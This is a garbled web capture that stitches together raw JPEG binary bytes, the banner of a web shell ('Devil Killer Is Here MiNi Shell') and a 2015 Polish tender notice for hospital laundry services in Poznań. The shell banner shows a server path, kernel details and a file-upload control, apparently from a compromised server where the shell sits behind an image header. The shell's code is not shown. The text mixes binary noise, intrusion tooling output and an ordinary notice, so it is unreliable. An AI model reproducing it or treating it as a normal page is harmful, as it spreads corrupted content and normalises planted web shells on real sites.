JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151214/184215-N-2015.html

<p class="kh_header"><b>Poznań: Wykonywanie usług pralniczych dla Szpitala Wojewódzkiego w Poznaniu</b><br>
<b>Numer ogłoszenia: 184215 - 2015; data zamieszczenia: 14.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki w Poznaniu , ul. Juraszów 7/19, 60-479 Poznań, woj. wielkopolskie, tel. 61 8212 359, 61 8212 267, faks 61 8212 359, 61 8233 451.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lutycka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług pralniczych dla Szpitala Wojewódzkiego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług pralniczych dla Szpitala Wojewódzkiego w Poznaniu. Wykonywanie w okresie 12 miesięcy od daty 01.02.2016 r. usług pralniczych oraz oczipowania na rzecz Szpitala Wojewódzkiego w Poznaniu, w skład których wchodzi: 1. Pranie bielizny i odzieży szpitalnej wraz z jej dezynfekcją w ilości ok. 28 830 kg miesięcznie ( odrębne pranie i pakowanie bielizny: operacyjnej, noworodkowej, dermatologicznej, Oddziału Anestezjologii i Intensywnej Terapii, Oddziałów Szpitala Rehabilitacyjnego w Kiekrzu, oraz Hotelu Pracowniczego). 2. Ponowne pranie bielizny szpitalnej z widocznymi nieusuniętymi plamami (np. krew, mocz ,kał). 3. Suszenie, maglowanie ( bielizna maglowana po stronie lewej, brzegi bielizny naciągnięte), prasowanie, 4. Dostawa i odbiór bielizny szpitalnej transportem wykonawcy na oddziały szpitalne: a) odbiór bielizny brudnej z oddziałów 2 x dziennie w godzinach 7.30-9.30 i 13.00 - 14.30 przez 5 dni w tygodniu od poniedziałku do piątku z możliwością zwiększenia częstotliwości odbioru bielizny brudnej z Bloku operacyjnego i Neurologii do trzech razy dziennie po odrębnym uzgodnieniu, b) odbiór bielizny brudnej z oddziałów w soboty 1 x dziennie w godzinach 8.30 - 10.30, c) dostawa czystej bielizny z dnia poprzedniego do magazynu bielizny do godz. 6.15, dostawa na Blok Operacyjny do godz. 6.40, na pozostałe oddziały do godz. 7.30 przez 5 dni w tygodniu od poniedziałku do piątku, d) dostawa czystej bielizny do magazynu w soboty do godz. 8.00, dostawa na oddziały do godz. 10.30, e) w okresie kumulacji dni wolnych dodatkowy odbiór brudnej bielizny i dostawa bielizny czystej po odrębnym uzgodnieniu z Zamawiającym, f) odbiór i dostawa bielizny do Szpitala Rehabilitacyjnego w Poznaniu ul. Uzdrowiskowa 2, 60-480 Poznań do 3 x w tygodniu (w terminach uzgodnionych z Zamawiającym) w godzinach 11.00-12.00. g) odbiór i dostawa bielizny do Hotelu Pracowniczego, ul. Dojazd 32,60-631 Poznań 1 x w tygodniu po odrębnym uzgodnieniu. 4. Zasada ewidencji bielizny przekazywanej do prania i jej odbioru oraz rozliczeń finansowych: a) odbiór ilości worków z brudną bielizną z oddziałów szpitalnych pokwitowana przez Wykonawcę na kartkach z wyszczególnionym asortymentem i ilością, b) ważenie zebranego asortymentu w pomieszczeniu do tego przeznaczonym, c) przekazanie czystej bielizny szpitalnej do magazynu Zamawiającego w sztukach oraz kilogramach, d) przekazanie bielizny brudnej i czystej każdorazowo musi być potwierdzone pisemnie przez upoważnionych przedstawicieli stron, e) podstawą rozliczeń finansowych będzie waga bielizny czystej, f) ważenie spoczywa na Wykonawcy w obecności pracownika Zamawiającego (Zamawiający udostępni pomieszczenia i wagi do ważenia bielizny czystej i brudnej), g) bielizna uszkodzona przekazana zostanie do szwalni w Szpitalu Wojewódzkim. 5. Transport bielizny brudnej z oddziałów i czystej na oddziały odbywać się musi na wózkach transportowych zapewniających szczelne zamknięcie przestrzeni ładunkowej (niedopuszczalne jest stosowanie np. uszkodzonych pokrowców, podkładek tekturowych). 6. Bielizna czysta dostarczona do oddziałów winna być ułożona asortymentowo w wózkach transportowych spełniających wymagania pkt. 7, przy zastosowaniu dodatkowego opakowania foliowego (maksymalny ciężar jednostkowy do 12 kg) przez pracowników Wykonawcy ubranych w czyste fartuchy. 7. Wykonawca zapewni wystarczającą ilość wózków transportowych do bielizny czystej, oraz rozpuszczalnych worków jednorazowych do bielizny skażonej na oddziały - wyjściowo po 3 szt. na każdy oddział i uzupełni w momencie zużycia (szacunkowo w ilości 300 szt. rocznie). Wykonawca zobowiązany jest do pozostawienia wózków do zbiórki bielizny na 7 oddziałach (ich nazwy poda Zamawiający na etapie zawarcia umowy przed przystąpieniem do jej realizacji). 8. Wykonawca zapewni prowadzenie pełnego procesu prania fartuchów operacyjnych barierowych bez ryzyka utraty ich właściwości( np. fartuchy MERTEX) wraz z ich oczipowaniem (RFID)na etapie oddania ich do użytkowania przed pierwszym praniem - umożliwiając bezdotykową identyfikację, liczenie i ewidencję bielizny brudnej i czystej w zakładzie pralniczym z podziałem na oddziały, w przypadku utraty czipa będzie on wymieniony przez Wykonawcę bez pobierania z tego tytułu dodatkowych opłat. 9. Wykonawca zapewni prowadzenie pełnego procesu prania i chemiczno - termiczną dezynfekcję ubrań operacyjnych (np. MEDITEX) ze znakowaniem krotności prania 10. Wykonawca zapewni prowadzenie pełnego procesu prania i chemiczno - termiczną dezynfekcję bielizny, pościeli, tkanin delikatnych i wełny, które nie mogą być prane w temperaturze powyżej 40 C. 11. Wykonawca zapewni prowadzenie pełnego procesu prania i chemiczno - termiczną dezynfekcję bielizny, pościeli i tkanin, które nie mogą być prane w temperaturze powyżej 60 C. 12. Bielizna będąca wyrobem medycznym musi być prana i dezynfekowana w środkach spełniających wymogi ustawy o wyrobach medycznych. Do prania bielizny ogólnego przeznaczenia wymagane jest stosowanie środków biobójczych posiadających aktualny wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. Zakres działania dezynfekcyjnego: bakteriobójczy, prątkobójczy, grzybobójczy, sporobójczy i wirusobójczy musi być potwierdzony pozytywną opinią zakładu, którego metodyka badań skuteczności produktów biobójczych i substancji czynnych została zaakceptowana przez Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (np. PZH) 13. Wykonawca zapewni pranie bielizny w obiekcie pralni, który powinien: a) mieć zapewnioną barierę higieniczną między stroną brudną i czystą poprzez fizyczny i funkcjonalny podział na strefę brudną i czystą. Pomieszczenia pralni powinny być urządzone w sposób zapewniający zachowanie bariery higienicznej rozumianej jako całkowite wyeliminowanie stykania się bielizny czystej z brudną oraz pracowników z tych dwóch stref: - strefa brudna - w której skład wchodzą pomieszczenia przyjmowania i składania brudnej bielizny, spłukiwania pieluch, załadunku bielizny do pralnic, pomieszczenia składowania środków piorących, przygotowywania roztworów piorących oraz ustępy - strefa czysta - w której skład wchodzą pomieszczenia wyładunku bielizny z pralnic, suszenia, prasowania, maglowania oraz mycia i dezynfekcji wózków (strona czysta), pomieszczenie składowania materiałów wypranych i zdezynfekowanych, pomieszczenie naprawy bielizny, pomieszczenie wydawania, pomieszczenia obsługi administracyjnej i zaplecza socjalnego oraz ustępy; - trójstopniowa śluza szatniowa usytuowana między strefą czystą i brudną oddzielająca oba obszary ścianami do pełnej wysokości pomieszczenia, b) stosować technologię przystosowaną do prania bielizny szpitalnej, c) w ścianę dzielącą pralnię na dwie strefy wmontowane są urządzenia pralnicze z oddzielnymi otworami do załadowania i rozładowania odpowiednio w obszarze czystym i brudnym, d) maszyny pralnicze powinny być wyposażone w automatyczne systemy dozujące środki piorące i dezynfekcyjne oraz w urządzenia kontrolujące parametry procesu prania i dezynfekcji umożliwiające wydruki parametrów prania oraz ich archiwizację, e) w pralni musi znajdować się dział mycia i dezynfekcji pojemników i wózków do transportu brudnej bielizny z zastosowaną barierą higieniczną oddzielającą strefę brudną od czystej. 14. Strefa brudna i czysta pralni powinny być podłączone do oddzielnych zespołów wentylacyjnych, które podlegają procesom czyszczenia i dezynfekcji co najmniej 1 x 24 m-ce. W strefie brudnej należy przewidywać podciśnienie w stosunku do strefy czystej. Śluza między częścią brudną i czystą powinna składać się z szatni brudnej, zespołu sanitarnego z natryskiem, ustępem i umywalką z baterią uruchamianą bez kontaktu z dłonią oraz wyposażeniem do dezynfekcji rąk oraz szatni czystej. 15. Wykonawca ponosi pełną odpowiedzialność za wykonywane usługi pralnicze w zakresie jakości i zgodności z wymogami sanitarnymi wobec organów kontroli (Stacja Sanitarno-Epidemiologiczna, PIP, BHP). SZACUNKOWA MIESIĘCZNA WIELKOŚĆ PRZEDMIOTU ZAMÓWIENIA ASORTYMENT WAGA (KG) Bielizna biała płaska 23 000 Fartuchy białe, bluzy, spodnie, spódnice, odzież ochronna 500 Bielizna operacyjna 800 Fartuchy operacyjne barierowe 100 Buty operacyjne 1 200 Poduszki z pierza oraz poduszki przeciwodleżynowe 100 Materace przeciwodleżynowe + z gąbki + pokrowce 30 Pieluchy, bielizna noworodkowa 800 Zasłony, firany, obrusy, serwetki, ręczniki 50 Koce 250 Bielizna skażona 50 Mopy 1 750 Bielizna nowa do sprania 200 RAZEM 28 830 W trakcie realizacji umowy Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia ilości prania w poszczególnych miesiącach, co nie będzie stanowić naruszenia wartości niniejszej umowy, o której mowa w § 5 ust. 1 wzoru umowy. Zamawiający nie dopuszcza składania ofert równoważnych Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Na potwierdzenie spełnienia ww. warunku Wykonawca zobowiązany jest do przedłożenia oświadczenia o spełnieniu warunków - załącznik nr 1 do SIWZ. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Na potwierdzenie spełnienia ww. warunku Wykonawca zobowiązany jest do przedłożenia oświadczenia o spełnieniu warunków - załącznik nr 1 do SIWZ. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Na potwierdzenie spełnienia ww. warunku Wykonawca zobowiązany jest do przedłożenia oświadczenia o spełnieniu warunków - załącznik nr 1 do SIWZ. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Na potwierdzenie spełnienia ww. warunku Wykonawca zobowiązany jest do przedłożenia oświadczenia o spełnieniu warunków - załącznik nr 1 do SIWZ. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie;

- Wykonawca przedstawi oświadczenie potwierdzające zapewnienie ciągłości wykonywania usługi prania w przypadku awarii w zakładzie pralniczym Wykonawcy (w oświadczeniu należy wskazać pralnię awaryjną);
- W celu zapewnienia maksymalnej dokładności i precyzji w rozliczeniu i ewidencji oznakowaniu chipami/tagami podlegać będzie odzież barierowa personelu medycznego, będąca własnością Zamawiającego. Pralnia Wykonawcy w której realizowane będzie zamówienie musi być wyposażona w funkcjonujący system RFID HF w celu identyfikowania i ewidencjonowania w/w bielizny przekazywanej do prania oraz zwracanej po praniu (czystej) do Zamawiającego - do oferty należy załączyć stosowne oświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia w sytuacjach nadzwyczajnych - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lutycka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2015 godzina 09:00, miejsce: w siedzibie Zamawiającego pokój nr 87a Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje dodatkowe do pkt. III.4.3.1) W zakresach wskazanych w rozdziałach 7.1 pkt. 1 i 7.2 pkt. 1 i 3 - dokumenty na zasadach w nich wskazanych, Informacje dodatkowe do pkt. III.5) Zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich. W celu spełnienia ww. warunku Zamawiający wymaga, aby przedłożyć:
- Zamawiający wymaga aby Wykonawca posiadał wdrożony i certyfikowany system zarządzania jakością ISO 9001:2008 oraz system zarządzania środowiskiem ISO 14001:2004 w zakresie co najmniej usług prania, czyszczenia chemicznego, dezynfekcji, suszenia i prasowania oraz renowacji i kompletowania z wykorzystaniem technologii RFID wraz z transportem dla placówek służby zdrowia. Stosowne certyfikaty niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi określonymi powyżej należy załączyć do oferty;
- System zarządzania jakością RABC (System kontroli i analizy skażeń biologicznych) co najmniej w zakresie kompleksowych usług prania, czyszczenia chemicznego, dezynfekcji, suszenia i prasowania oraz renowacji i kompletowania wraz z transportem dla placówek służby zdrowia z wykorzystaniem technologii RFID spełniającej standardy ISO 18000-3/ISO 15693 oraz systemu kodów kreskowych, a także wypożyczania wyrobów tekstylnych dla placówek służby zdrowia. System kontroli skażenia mikrobiologicznego ma umożliwiać pralniom zapewnienie odpowiedniej jakości mikrobiologicznej pranych tekstyliów. Na potwierdzenie posiadania i wdrożenia systemu PN EN 14065:2005 Wykonawca załącza do oferty certyfikat niezależnego podmiotu zajmującego się poświadczeniem zgodności działań Wykonawcy z normą jakościową określoną powyżej.
- Usługa musi być wykonana w preparatach piorących i piorąco-dezynfekcyjnych jak dla prania bielizny i odzieży szpitalnej - Wykonawca dołączy wymagane atesty i opinie, środki stosowane do prania i dezynfekcji bielizny niemowlęcej dodatkowo powinny posiadać pozytywną opinię Instytutu Matki i Dziecka lub równoważnej instytucji. Do oferty załączyć ww. opinię.
- Wymagane potwierdzenie, że pralnia Wykonawcy jest pod stałym nadzorem producenta środków piorących i dezynfekcyjnych. Dokument potwierdzający nie może być wystawiony wcześniej niż 3 miesiące przed terminem składania ofert.
- Pralnia, w której będą wykonywane usługi musi posiadać pozytywna opinię właściwego inspektora sanitarnego, dopuszczającą wskazany obiekt pralni do świadczenia usług pralniczych w zakładach opieki zdrowotnej. Do oferty załączyć opinię.
- Dostawa bielizny czystej do siedziby zamawiającego i odbiór bielizny brudnej z jego siedziby odbywać się będzie transportem Wykonawcy. Wymagane jest, aby środki transportu posiadały pozytywna opinie właściwego Inspektora Sanitarnego potwierdzająca spełnienie warunków sanitarnych i dopuszczenie ich do transportu bielizny szpitalnej - do oferty należy załączyć pozytywną opinię sanitarną.
- Przedłożenie badań mikrobiologicznych potwierdzających, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego. Wykonawca załączy do oferty wyniki badań potwierdzających czystość mikrobiologiczną:
a) blatu stołu do składania czystej bielizny - co najmniej po jednym badaniu z I półrocza 2015 roku oraz z II półrocza 2015 roku, badania muszą być wykonane przez laboratorium posiadające akredytację Polskiego Centrum Akredytacji
b) wewnętrznej ściany komory do mycia i dezynfekcji wózków - co najmniej po jednym badaniu z I półrocza 2015 roku oraz z II półrocza 2015 roku, badania muszą być wykonane przez laboratorium posiadające akredytację Polskiego Centrum Akredytacji
c) bielizny pościelowej (ogólnoszpitalnej) po praniu z dezynfekcją - co najmniej po jednym badaniu z I półrocza 2015  roku oraz z II półrocza 2015 roku, badania muszą być wykonane przez i laboratorium posiadające akredytację Polskiego Centrum Akredytacji
